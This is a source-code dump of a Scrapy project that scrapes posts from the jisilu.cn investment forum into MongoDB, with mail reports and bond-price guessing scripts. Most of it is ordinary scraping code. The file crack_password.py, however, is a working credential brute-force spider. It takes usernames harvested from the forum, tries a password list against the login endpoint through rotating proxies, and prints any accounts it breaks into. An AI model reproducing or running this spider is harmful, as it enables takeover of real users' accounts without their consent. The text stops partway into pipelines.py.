├── jsl ├── __init__.py ├── spiders │ ├── __init__.py │ ├── aes_encode.py │ ├── crack_password.py │ ├── relationship.py │ ├── questions_loop.py │ ├── jisilu_user_content.py │ ├── weekly_content.py │ ├── allcontent.py │ └── questions.py ├── items.py ├── middlewares.py ├── settings.py └── pipelines.py ├── daily_trend.bat ├── jsl_daily_content.bat ├── jsl_comphrehensive_content.bat ├── .gitattributes ├── .gitignore ├── single_user.py ├── question.py ├── comprehensive_content.py ├── scrapy.cfg ├── daily_content.py ├── weekly_content.py ├── README.md ├── run.py ├── daily_send.py ├── mongo_syncup.py ├── guess_first_day_price.py ├── collect_username.py ├── trend.py ├── guess_first_day_price_syncup.py ├── crack_jsl.py └── 数据迁移.ipynb /jsl/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /daily_trend.bat: -------------------------------------------------------------------------------- 1 | cd C:\Users\Administrator\Documents\code\jsl 2 | python daily_send.py -------------------------------------------------------------------------------- /jsl_daily_content.bat: -------------------------------------------------------------------------------- 1 | cd C:\Users\Administrator\Documents\code\jsl 2 | python daily_content.py -------------------------------------------------------------------------------- /jsl_comphrehensive_content.bat: -------------------------------------------------------------------------------- 1 | cd C:\Users\Administrator\Documents\code\jsl 2 | python comprehensive_content.py -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | *.js linguist-language=python 2 | *.css linguist-language=python 3 | *.ipynb linguist-language=python 4 | *.html linguist-language=python -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | .idea 3 | config.py 4 | *.log 5 | settings.py 6 | data.cfg 7 | config_path/config.json 8 | config_.py 9 | creator.txt 10 | userinfo.py 11 | .ipynb_checkpoints/ -------------------------------------------------------------------------------- /single_user.py: -------------------------------------------------------------------------------- 1 | from scrapy import cmdline 2 | import datetime 3 | # 获取指定日期内的所有帖子 4 | 5 | # cmd = 'scrapy crawl allcontent' 6 | cmd = 'scrapy crawl single_user' 7 | cmdline.execute(cmd.split()) -------------------------------------------------------------------------------- /jsl/spiders/__init__.py: -------------------------------------------------------------------------------- 1 | # This package will contain the spiders of your Scrapy project 2 | # 3 | # Please refer to the documentation for information on how to create and manage 4 | # your spiders. 5 | -------------------------------------------------------------------------------- /question.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | # @Time : 2018/12/27 17:04 4 | # @File : question.py 5 | 6 | from scrapy import cmdline 7 | 8 | cmd = 'scrapy crawl questions -s LOG_FILE=log/question.log' 9 | # cmd = 'scrapy crawl questions' 10 | cmdline.execute(cmd.split()) -------------------------------------------------------------------------------- /comprehensive_content.py: -------------------------------------------------------------------------------- 1 | from scrapy import cmdline 2 | import datetime 3 | # 获取指定日期内的所有帖子 4 | 5 | # cmd = 'scrapy crawl allcontent' 6 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=no'.format(datetime.datetime.now().strftime('%Y-%m-%d')) 7 | cmdline.execute(cmd.split()) -------------------------------------------------------------------------------- /scrapy.cfg: -------------------------------------------------------------------------------- 1 | # Automatically created by: scrapy startproject 2 | # 3 | # For more information about the [deploy] section see: 4 | # https://scrapyd.readthedocs.org/en/latest/deploy.html 5 | 6 | [settings] 7 | default = jsl.settings 8 | 9 | [deploy] 10 | #url = http://localhost:6800/ 11 | project = jsl 12 | -------------------------------------------------------------------------------- /daily_content.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | # @Time : 2018/12/27 16:58 4 | # @File : daily_content.py 5 | from scrapy import cmdline 6 | import datetime 7 | # 获取指定日期内的所有帖子 8 | 9 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d')) 10 | cmdline.execute(cmd.split()) 11 | -------------------------------------------------------------------------------- /weekly_content.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | # @Time : 2018/12/27 16:58 4 | # @File : daily_content.py 5 | from scrapy import cmdline 6 | import datetime 7 | # 获取指定日期内的所有帖子 8 | 9 | # cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d')) 10 | cmd = 'scrapy crawl week_content' 11 | cmdline.execute(cmd.split()) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # jsl 2 | 抓取集思录指定的用户的帖子,存档到mongo 3 | 4 | #### 2020-11-27更新 加入登录JS加密与解密 5 | [http://30daydo.com/article/44109](http://30daydo.com/article/44109) 6 | 7 |
8 | 使用方法: 9 | 安装scrapy + pymongo, 安装mongo服务器 10 | 11 | 安装完成后运行 python run.py 12 | 需要抓取指定的用户名:比如 毛之川 13 | 等待程序返回用户的id,然后把id 复制到spider/jisilu.py 文件中的 self.uid = '8132', 替换这个值 14 | 修改pipeline.py文件中这一行 15 | self.user = u'毛之川' # 修改为指定的用户名 如 毛之川 16 | 17 | #### 新增爬取全站数据 18 | 19 | #### guess_first_day_price_syncup.py 估算可转债上市价格 20 | 21 | ### 关注公众号: 可转债量化分析 22 | ![可转债量化分析](http://xximg.30daydo.com/picgo/kzz.jpg) -------------------------------------------------------------------------------- /jsl/spiders/aes_encode.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # @Time : 2020/11/27 22:00 3 | # @File : aes_encode.py 4 | # @Author : Rocky C@www.30daydo.com 5 | 6 | import execjs 7 | import os 8 | key = '397151C04723421F' 9 | filename = 'encode_jsl.js' 10 | path = os.path.dirname(os.path.abspath(__file__)) 11 | full_path = os.path.join(path,filename) 12 | 13 | def decoder(text): 14 | with open(full_path, 'r', encoding='utf8') as f: 15 | source = f.read() 16 | 17 | ctx = execjs.compile(source) 18 | return ctx.call('jslencode', text, key) 19 | 20 | 21 | if __name__ == '__main__': 22 | print(decoder('123456')) -------------------------------------------------------------------------------- /run.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | __author__ = 'Rocky' 4 | ''' 5 | http://30daydo.com 6 | Email: weigesysu@qq.com 7 | ''' 8 | from scrapy import cmdline 9 | import requests 10 | import re 11 | 12 | def search_id(): 13 | name = input(u'请输入你需要抓取的用户名: ') 14 | url = 'https://www.jisilu.cn/people/{}'.format(str(name)) 15 | # url ='https://www.jisilu.cn/people/持有封基' 16 | r = requests.get(url) 17 | user_id = re.findall('var PEOPLE_USER_ID = \'(\d+)\';' , r.text) 18 | print(user_id[0]) 19 | 20 | def main(): 21 | # search_id() 22 | # exit() 23 | 24 | cmd = 'scrapy crawl allcontent' 25 | 26 | 27 | 28 | if __name__ == '__main__': 29 | main() -------------------------------------------------------------------------------- /jsl/items.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your scraped items 4 | # 5 | # See documentation in: 6 | # http://doc.scrapy.org/en/latest/topics/items.html 7 | 8 | import scrapy 9 | 10 | 11 | class JslItem(scrapy.Item): 12 | # define the fields for your item here like: 13 | # name = scrapy.Field() 14 | title = scrapy.Field() 15 | creator = scrapy.Field() 16 | content = scrapy.Field() 17 | content_html = scrapy.Field() 18 | url = scrapy.Field() 19 | html = scrapy.Field() 20 | question_id = scrapy.Field() 21 | createTime = scrapy.Field() 22 | resp_no = scrapy.Field() 23 | resp = scrapy.Field() # list 24 | crawlTime = scrapy.Field() 25 | # type_ = scrapy.Field() 26 | last_resp_date = scrapy.Field() 27 | only_add = scrapy.Field() 28 | 29 | class Relationship(scrapy.Item): 30 | user_id = scrapy.Field() 31 | flag = scrapy.Field() 32 | user = scrapy.Field() 33 | prestige = scrapy.Field() # 威望 34 | approve = scrapy.Field() # 赞同 35 | follows_count = scrapy.Field() 36 | fans_count = scrapy.Field() 37 | follows_list = scrapy.Field() 38 | fans_list = scrapy.Field() 39 | crawltime = scrapy.Field() 40 | 41 | 42 | -------------------------------------------------------------------------------- /daily_send.py: -------------------------------------------------------------------------------- 1 | # 每天的热帖 2 | 3 | import datetime 4 | import pymongo 5 | from settings import send_from_aliyun,DBSelector 6 | 7 | last_time = -10 # 多少周之前 8 | 9 | 10 | db=DBSelector().mongo() 11 | MAX = 1000 12 | current = datetime.datetime.now() 13 | 14 | last_day = current + datetime.timedelta(hours=-32) # 脚本设置在早上8点运行 15 | current_str = current.strftime("%Y-%m-%d") 16 | 17 | 18 | def main(): 19 | result = db['db_parker']['jsl'].find({},{'html':0}).sort('_id',pymongo.DESCENDING).limit(MAX) 20 | filter_result = [] 21 | for i in result: 22 | createTime = i['createTime'] 23 | createTime = datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M') 24 | if createTime >= last_day : 25 | title = i['title'] 26 | creator = i['creator'] 27 | resp_count = len(i['resp']) 28 | url = i['url'] 29 | d = {'title':title,'url':url,'resp_count':resp_count} 30 | filter_result.append(d) 31 | 32 | hot_list = list(sorted(filter_result,key=lambda x:x['resp_count'],reverse=True))[:10] 33 | title,html = format_mail(hot_list) 34 | try: 35 | send_from_aliyun(title,html,types='html') 36 | 37 | except Exception as e: 38 | # logger.error(e) 39 | print(e) 40 | 41 | 42 | def format_mail(hot_list): 43 | title='{} jsl TOP10'.format(current_str) 44 | content = '' 45 | for hl in hot_list: 46 | content+='

{} 回复:{}

'.format(hl['url'],hl['title'],hl['resp_count']) 47 | 48 | return title,content 49 | 50 | 51 | 52 | if __name__ == '__main__': 53 | main() -------------------------------------------------------------------------------- /mongo_syncup.py: -------------------------------------------------------------------------------- 1 | # 同步两个mongodb的数据 2 | import pymongo 3 | from settings import DBSelector 4 | from loguru import logger 5 | 6 | logger.add('syncup.log') 7 | db=DBSelector() 8 | client = db.mongo('qq') 9 | remote=client['db_parker']['jsl'] 10 | local=pymongo.MongoClient()['db_parker']['jsl'] 11 | remote_data = remote.find() 12 | 13 | # 更新本地数据 14 | def update(item,question_id,update=False): 15 | del item['_id'] 16 | 17 | if update: 18 | local.update_one({'question_id':question_id},{'$set':{'resp':item['resp'],'resp_no':item['resp_no']}}) 19 | else: 20 | local.insert_one(item) 21 | remote.delete_one({'question_id': question_id}) 22 | 23 | def remove(item): 24 | remote.delete_one({'_id': item['_id']}) 25 | 26 | 27 | 28 | for item in remote_data: 29 | question_id = item['question_id'] 30 | local_find_doc = local.find_one({'question_id':question_id}) 31 | if local_find_doc: 32 | resp_no = item['resp_no'] 33 | 34 | if resp_no<=local_find_doc['resp_no']: 35 | try: 36 | remove(item) 37 | except Exception as e: 38 | logger.error(e) 39 | else: 40 | logger.info(f'删除相同{question_id}') 41 | 42 | else: 43 | try: 44 | update(item,question_id,True) 45 | except Exception as e: 46 | logger.error(e) 47 | 48 | else: 49 | logger.info(f'更新本地{question_id}') 50 | else: 51 | try: 52 | update(item,question_id,False) 53 | except Exception as e: 54 | logger.error(e) 55 | else: 56 | logger.info(f'删除不存在,备份后的{question_id}') 57 | -------------------------------------------------------------------------------- /guess_first_day_price.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # website: http://30daydo.com 3 | # @Time : 2019/7/10 22:46 4 | # @File : guess_first_day_price.py 5 | 6 | # 猜测第一天上市价格 7 | # 使用twsisted失败 8 | 9 | from twisted.web.client import getPage 10 | from twisted.internet import reactor 11 | from twisted.internet import defer 12 | from scrapy.selector import Selector 13 | import numpy as np 14 | 15 | result_list = [] 16 | 17 | def get_response_callback(content): 18 | # print(content) 19 | 20 | text = str(content,encoding='utf-8') 21 | # print(text) 22 | response = Selector(text=text) 23 | nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div') 24 | for node in nodes: 25 | reply = node.xpath('.//div[@class="markitup-box"]/text()').extract_first() 26 | if reply: 27 | reply = reply.strip() 28 | # print(reply) 29 | result_list.append(float(reply)) 30 | 31 | print('done') 32 | 33 | 34 | @defer.inlineCallbacks 35 | def task(url): 36 | d= getPage(url.encode('utf-8')) 37 | d.addCallback(get_response_callback) 38 | yield d 39 | 40 | def get_result(): 41 | # print(result_list) 42 | # print(result_list) 43 | result = np.array(result_list) 44 | print(result.mean()) 45 | 46 | urls='https://www.jisilu.cn/question/id-321075__sort_key-__sort-DESC__uid-__page-{}' 47 | d_list=[] 48 | page = 4 49 | for i in range(1,page+1): 50 | # print(urls.format(i)) 51 | t = task(urls.format(i)) 52 | # t = task(urls) 53 | d_list.append(t) 54 | d = defer.DeferredList(d_list) 55 | # d.addBoth(lambda _:reactor.callLater(0,get_result())) 56 | d.addBoth(lambda _:reactor.stop()) 57 | reactor.run() 58 | 59 | -------------------------------------------------------------------------------- /collect_username.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # website: http://30daydo.com 3 | # @Time : 2020/9/5 14:25 4 | # @File : collect_username.py 5 | import pymongo 6 | import codecs 7 | from loguru import logger 8 | from jsl import config 9 | 10 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 11 | client = pymongo.MongoClient(connect_uri) 12 | 13 | doc = client['db_parker'][config.doc_name] 14 | 15 | def collect_creator(): 16 | creators = doc.find({},{'creator':1}) 17 | user_set = set() 18 | count = 0 19 | for create in creators.batch_size(100): 20 | print(count) 21 | count+=1 22 | name = create.get('creator') 23 | # print(name) 24 | if name is not None and isinstance(name,str): 25 | user_set.add(name) 26 | user_list = list(user_set) 27 | user_str = '\n'.join(user_list) 28 | with codecs.open('creator.txt','w',encoding='utf8') as f: 29 | f.write(user_str) 30 | 31 | 32 | def get_user(filename): 33 | user_list = None 34 | with codecs.open(filename,'r',encoding='utf8') as f: 35 | user_list = f.readlines() 36 | user_list=set(map(lambda x:x.strip(),user_list)) 37 | return user_list 38 | 39 | def repler(): 40 | resps = doc.find({},{'resp':1,'_id':0}) 41 | user_set = set() 42 | count = 0 43 | creartor_set = get_user('creator.txt') 44 | 45 | for resp in resps.batch_size(500): 46 | resp_list = resp.get('resp') 47 | if resp_list: 48 | for resp_ in resp_list: 49 | name=list(resp_.keys())[0] 50 | if name not in creartor_set and name not in user_set: 51 | count += 1 52 | print(count) 53 | print(name) 54 | user_set.add(name) 55 | user_list = list(user_set) 56 | user_str = '\n'.join(user_list) 57 | with codecs.open('reply.txt','w',encoding='utf8') as f: 58 | f.write(user_str) 59 | 60 | repler() 61 | logger.info('Done') 62 | 63 | 64 | -------------------------------------------------------------------------------- /trend.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | # @Time : 2020/1/1 0:08 4 | # @File : trend.py 5 | # 统计发帖趋势 6 | import datetime 7 | import numpy as np 8 | import pandas as pd 9 | from settings import send_from_aliyun, llogger,DBSelector 10 | 11 | last_time = -10 # 多少周之前 12 | 13 | logger = llogger('log/trend_.log') 14 | db = DBSelector().mongo() 15 | doc = db['db_parker']['jsl'] 16 | total_list = [] 17 | date = datetime.datetime.now() + datetime.timedelta(days=-365) # 一年内的数据 18 | 19 | 20 | def main(send_mail=True): 21 | for item in doc.find({'last_resp_date': {'$gt': date}}, {'html': 0, 'resp': 0, 'content': 0}): 22 | del item['_id'] 23 | total_list.append(item) 24 | 25 | df = pd.DataFrame(total_list) 26 | df['createTime'] = pd.to_datetime(df['createTime']) 27 | df = df.set_index('createTime', drop=True) 28 | new_df = df.resample('W').count() 29 | show_data = new_df[['creator']].iloc[:last_time:-1] 30 | # print(show_data) 31 | # 最大值与 32 | max_index = new_df['creator'].idxmax().to_pydatetime().strftime('%Y-%m-%d') 33 | max_v = new_df['creator'].max() 34 | current = datetime.datetime.now().strftime('%Y-%m-%d') 35 | title = f'jsl一周发帖数量分析 {current}' 36 | percentage = np.round( 37 | (show_data['creator'].values[:-1] - show_data['creator'].values[1:]) / show_data['creator'].values[1:] * 100, 0) 38 | content = '| 日期 | 贴数 | 环比 |\n' 39 | # print(percentage) 40 | percentage = np.append(percentage, np.nan) 41 | start_index = 0 42 | for index, item in show_data.iterrows(): 43 | # print(index,item['creator']) 44 | py_date = index.to_pydatetime().strftime('%Y-%m-%d') 45 | count = item['creator'] 46 | content += f'| {py_date} | {count} | {percentage[start_index]}% |\n' 47 | start_index += 1 48 | content += f'最大值发生在 {max_index},贴数为 {max_v}\n' 49 | logger.info(title) 50 | logger.info(content) 51 | if send_mail: 52 | try: 53 | send_from_aliyun(title, content) 54 | except Exception as e: 55 | logger.error(e) 56 | 57 | 58 | def process_data(): 59 | ''' 60 | 清除一些无用字段的 61 | :return: 62 | ''' 63 | # for item in doc.find({'createTime': {"$regex": "^发"}}, {'_id': 1,'createTime':1}): 64 | for item in doc.find({'crawlTime': None}, {'_id': 1}): 65 | # print(item) 66 | doc.delete_one({'_id': item['_id']}) 67 | print(item) 68 | 69 | if __name__ == '__main__': 70 | main(send_mail=True) 71 | # process_data() 72 | -------------------------------------------------------------------------------- /jsl/middlewares.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your spider middleware 4 | # 5 | # See documentation in: 6 | # http://doc.scrapy.org/en/latest/topics/spider-middleware.html 7 | import time 8 | 9 | import requests 10 | from scrapy import signals 11 | from jsl.config import proxy_ip 12 | 13 | class JslSpiderMiddleware(object): 14 | # Not all methods need to be defined. If a method is not defined, 15 | # scrapy acts as if the spider middleware does not modify the 16 | # passed objects. 17 | 18 | @classmethod 19 | def from_crawler(cls, crawler): 20 | # This method is used by Scrapy to create your spiders. 21 | s = cls() 22 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) 23 | return s 24 | 25 | def process_spider_input(self, response, spider): 26 | # Called for each response that goes through the spider 27 | # middleware and into the spider. 28 | 29 | # Should return None or raise an exception. 30 | return None 31 | 32 | def process_spider_output(self, response, result, spider): 33 | # Called with the results returned from the Spider, after 34 | # it has processed the response. 35 | 36 | # Must return an iterable of Request, dict or Item objects. 37 | for i in result: 38 | yield i 39 | 40 | def process_spider_exception(self, response, exception, spider): 41 | # Called when a spider or process_spider_input() method 42 | # (from other spider middleware) raises an exception. 43 | 44 | # Should return either None or an iterable of Response, dict 45 | # or Item objects. 46 | pass 47 | 48 | def process_start_requests(self, start_requests, spider): 49 | # Called with the start requests of the spider, and works 50 | # similarly to the process_spider_output() method, except 51 | # that it doesn’t have a response associated. 52 | 53 | # Must return only requests (not items). 54 | for r in start_requests: 55 | yield r 56 | 57 | def spider_opened(self, spider): 58 | spider.logger.info('Spider opened: %s' % spider.name) 59 | 60 | class MyCustomDownloaderMiddleware(object): 61 | def __init__(self): 62 | self.proxyurl = 'http://{}:8101/dynamicIp/common/getDynamicIp.do'.format(proxy_ip) 63 | 64 | def process_request(self, request, spider): 65 | proxyServer = self.get_proxy() 66 | print('使用了代理') 67 | print(proxyServer) 68 | request.meta["proxy"] = proxyServer 69 | 70 | def get_proxy(self, retry=50): 71 | for i in range(retry): 72 | try: 73 | r = requests.get(self.proxyurl, timeout=10) 74 | except Exception as e: 75 | print(e) 76 | print('Failed to get proxy ip, retry ' + str(i)) 77 | time.sleep(1) 78 | else: 79 | js = r.json() 80 | proxyServer = 'https://{0}:{1}'.format(js.get('ip'), js.get('port')) 81 | return proxyServer 82 | 83 | return None 84 | -------------------------------------------------------------------------------- /jsl/spiders/crack_password.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # website: http://30daydo.com 3 | # @Time : 2020/9/5 14:03 4 | # @File : crack_password.py 5 | 6 | # 登录破解 7 | import json 8 | 9 | import pymongo 10 | from scrapy import Spider 11 | import codecs 12 | from scrapy import FormRequest, Request 13 | from jsl import config 14 | 15 | class CrackSpider(Spider): 16 | name = 'crack' 17 | custom_settings = {'COOKIES_ENABLED': False, 18 | 'DOWNLOADER_MIDDLEWARES': {'jsl.middlewares.MyCustomDownloaderMiddleware': 543}, 19 | 'ITEM_PIPELINES': {'jsl.pipelines.JslPipeline': None}, 20 | 'CONCURRENT_REQUESTS':1 21 | } 22 | 23 | def __init__(self, *args,**kwargs): 24 | super(CrackSpider, self).__init__(*args,**kwargs) 25 | self.doc = pymongo.MongoClient(host=config.mongodb_host,port=config.mongodb_port) 26 | 27 | filename = 'creator.txt' 28 | with codecs.open(filename, 'r', encoding='utf8') as f: 29 | conent = f.readlines() 30 | self.content = list(map(lambda x: x.strip(), conent)) 31 | 32 | self.url = 'https://www.jisilu.cn/account/ajax/login_process/' 33 | self.data = { 34 | 'return_url': 'https://www.jisilu.cn/', 35 | 'user_name': '', 36 | 'password': '', 37 | 'net_auto_login': '1', 38 | '_post_type': 'ajax', 39 | } 40 | self.headers = { 41 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 42 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 43 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 44 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 45 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 46 | 'Referer': 'https://www.jisilu.cn/login/', 47 | 'Accept-Encoding': 'gzip,deflate,br', 48 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 49 | } 50 | with open('password.txt', 'r') as f: 51 | password_list = f.readlines() 52 | self.password_list = list(map(lambda x: x.strip(), password_list)) 53 | 54 | def start_requests(self): 55 | 56 | yield Request( 57 | url='https://www.jisilu.cn', 58 | headers=self.headers, 59 | callback=self.parse_user, 60 | cookies=None, 61 | ) 62 | 63 | def parse_user(self, response): 64 | user = self.content.pop() 65 | while user: 66 | for password in self.password_list: 67 | data = self.data.copy() 68 | data['user_name'] = user 69 | data['password'] = password 70 | yield FormRequest( 71 | url=self.url, 72 | headers=self.headers, 73 | formdata=data, 74 | callback=self.parse_data, 75 | dont_filter=True, 76 | cookies=None, 77 | meta={'username':user,'password':password} 78 | ) 79 | 80 | def parse_data(self, response): 81 | print(response.text) 82 | js_data = json.loads(response.text) 83 | errno = js_data.get('errno') 84 | if errno==0: 85 | print('*********') 86 | print('user==>',response.meta['username']) 87 | print('password==>',response.meta['password']) -------------------------------------------------------------------------------- /guess_first_day_price_syncup.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # website: http://30daydo.com 3 | # @Time : 2019/10/20 19:41 4 | # @File : guess_first_day_price_syncup.py 5 | 6 | # 同步获取 7 | import sys 8 | import time 9 | from selenium import webdriver 10 | from scrapy.selector import Selector 11 | from jsl import config 12 | import pymongo 13 | 14 | 15 | 16 | headers = {'User-Agent': 'FireFox Molliza Chrome'} 17 | path = r'D:\OneDrive\Python\selenium\chromedriver.exe' 18 | option = webdriver.ChromeOptions() 19 | option.add_argument( 20 | '--user-agent=Mozilla/5.0 (Windows NT 9.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36') 21 | option.add_argument('--headless') 22 | driver = webdriver.Chrome(executable_path=path, chrome_options=option) 23 | driver.implicitly_wait(10) 24 | 25 | 26 | def login(): 27 | url = 'https://www.jisilu.cn/login/' 28 | driver.get(url) 29 | input_name = driver.find_element_by_xpath('//input[@id="aw-login-user-name"]') 30 | input_name.send_keys(config.jsl_user) 31 | password = driver.find_element_by_xpath('//input[@id="aw-login-user-password"]') 32 | password.send_keys(config.jsl_password) 33 | time.sleep(0.5) 34 | submit = driver.find_element_by_xpath('//a[@id="login_submit"]') 35 | submit.click() 36 | time.sleep(5) 37 | 38 | 39 | def predict(url,name): 40 | 41 | driver.get(url) 42 | current_page = 1 43 | sum = 0 44 | price_list = [] 45 | while 1: 46 | 47 | try: 48 | 49 | price = parse(driver.page_source) 50 | if price: 51 | price_list.extend(price) 52 | 53 | next_btn = driver.find_element_by_xpath('//div[@class="pagination pull-right"]//a[contains(text(),">")]') 54 | 55 | except Exception as e: 56 | print(e) 57 | break 58 | else: 59 | 60 | current_page += 1 61 | next_btn.click() 62 | # 改为去掉最大和最小的值 63 | max_v=max(price_list) 64 | min_v=min(price_list) 65 | # print(price_list) 66 | price_list.remove(max_v) 67 | price_list.remove(min_v) 68 | # print(price_list) 69 | # price_np = np.array(price_list) 70 | for i in price_list: 71 | sum+=i 72 | 73 | avg = round( sum/len(price_list),3) 74 | print(f'avg price {avg}') 75 | client = pymongo.MongoClient(config.mongodb_host, config.mongodb_port) 76 | doc = client['db_stock']['kzz_price_predict'] 77 | doc.insert_one({'name':name,'predict_price':avg}) 78 | driver.close() 79 | 80 | 81 | def parse(text): 82 | response = Selector(text=text) 83 | nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]') 84 | result_list = [] 85 | for node in nodes: 86 | comment = node.xpath( 87 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first() 88 | if comment: 89 | comment = comment.strip() 90 | try: 91 | comment = float(comment) 92 | 93 | except Exception as e: 94 | continue 95 | else: 96 | result_list.append(comment) 97 | else: 98 | continue 99 | return result_list 100 | 101 | 102 | def main(url,name): 103 | login() 104 | predict(url,name) 105 | 106 | if __name__ == '__main__': 107 | if len(sys.argv)!=3: 108 | print('python guess_first_price_syncup url name\n') 109 | else: 110 | url=sys.argv[1] 111 | name =sys.argv[2] 112 | main(url,name) 113 | -------------------------------------------------------------------------------- /jsl/settings.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Scrapy settings for jsl project 4 | # 5 | # For simplicity, this file contains only settings considered important or 6 | # commonly used. You can find more settings consulting the documentation: 7 | # 8 | # http://doc.scrapy.org/en/latest/topics/settings.html 9 | # http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html 10 | # http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html 11 | 12 | BOT_NAME = 'jsl' 13 | 14 | SPIDER_MODULES = ['jsl.spiders'] 15 | NEWSPIDER_MODULE = 'jsl.spiders' 16 | 17 | 18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent 19 | #USER_AGENT = 'jsl (+http://www.yourdomain.com)' 20 | 21 | # Obey robots.txt rules 22 | ROBOTSTXT_OBEY = False 23 | 24 | # Configure maximum concurrent requests performed by Scrapy (default: 16) 25 | 26 | #CONCURRENT_REQUESTS = 32 27 | # LOG_LEVEL='INFO' 28 | CONCURRENT_REQUESTS = 2 29 | LOG_LEVEL='INFO' 30 | DOWNLOAD_DELAY = 1 31 | # REDIRECT_ENABLED = False 32 | # Configure a delay for requests for the same website (default: 0) 33 | # See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay 34 | # See also autothrottle settings and docs 35 | # DOWNLOAD_DELAY = 1 36 | # The download delay setting will honor only one of: 37 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16 38 | #CONCURRENT_REQUESTS_PER_IP = 16 39 | 40 | # Disable cookies (enabled by default) 41 | COOKIES_ENABLED = True 42 | 43 | # Disable Telnet Console (enabled by default) 44 | #TELNETCONSOLE_ENABLED = False 45 | 46 | # Override the default request headers: 47 | #DEFAULT_REQUEST_HEADERS = { 48 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 49 | # 'Accept-Language': 'en', 50 | #} 51 | 52 | # Enable or disable spider middlewares 53 | # See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html 54 | #SPIDER_MIDDLEWARES = { 55 | # 'jsl.middlewares.JslSpiderMiddleware': 543, 56 | #} 57 | 58 | # Enable or disable downloader middlewares 59 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html 60 | # DOWNLOADER_MIDDLEWARES = { 61 | # 'jsl.middlewares.MyCustomDownloaderMiddleware': 543, 62 | # } 63 | 64 | # Enable or disable extensions 65 | # See http://scrapy.readthedocs.org/en/latest/topics/extensions.html 66 | #EXTENSIONS = { 67 | # 'scrapy.extensions.telnet.TelnetConsole': None, 68 | #} 69 | 70 | # Configure item pipelines 71 | # See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html 72 | ITEM_PIPELINES = { 73 | # 'jsl.pipelines.ElasticPipeline': 300, 74 | 'jsl.pipelines.JslPipeline':300, 75 | # 'scrapyelasticsearch.scrapyelasticsearch.ElasticSearchPipeline':200, 76 | } 77 | 78 | # Enable and configure the AutoThrottle extension (disabled by default) 79 | # See http://doc.scrapy.org/en/latest/topics/autothrottle.html 80 | #AUTOTHROTTLE_ENABLED = True 81 | # The initial download delay 82 | #AUTOTHROTTLE_START_DELAY = 5 83 | # The maximum download delay to be set in case of high latencies 84 | #AUTOTHROTTLE_MAX_DELAY = 60 85 | # The average number of requests Scrapy should be sending in parallel to 86 | # each remote server 87 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0 88 | # Enable showing throttling stats for every response received: 89 | #AUTOTHROTTLE_DEBUG = False 90 | 91 | # Enable and configure HTTP caching (disabled by default) 92 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings 93 | #HTTPCACHE_ENABLED = True 94 | #HTTPCACHE_EXPIRATION_SECS = 0 95 | #HTTPCACHE_DIR = 'httpcache' 96 | #HTTPCACHE_IGNORE_HTTP_CODES = [] 97 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage' 98 | 99 | ELASTICSEARCH_SERVERS = ['10.18.6.102:9200'] 100 | ELASTICSEARCH_INDEX='jsl_elastic' 101 | ELASTICSEARCH_TYPE='ticket' 102 | -------------------------------------------------------------------------------- /jsl/pipelines.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define your item pipelines here 4 | # 5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting 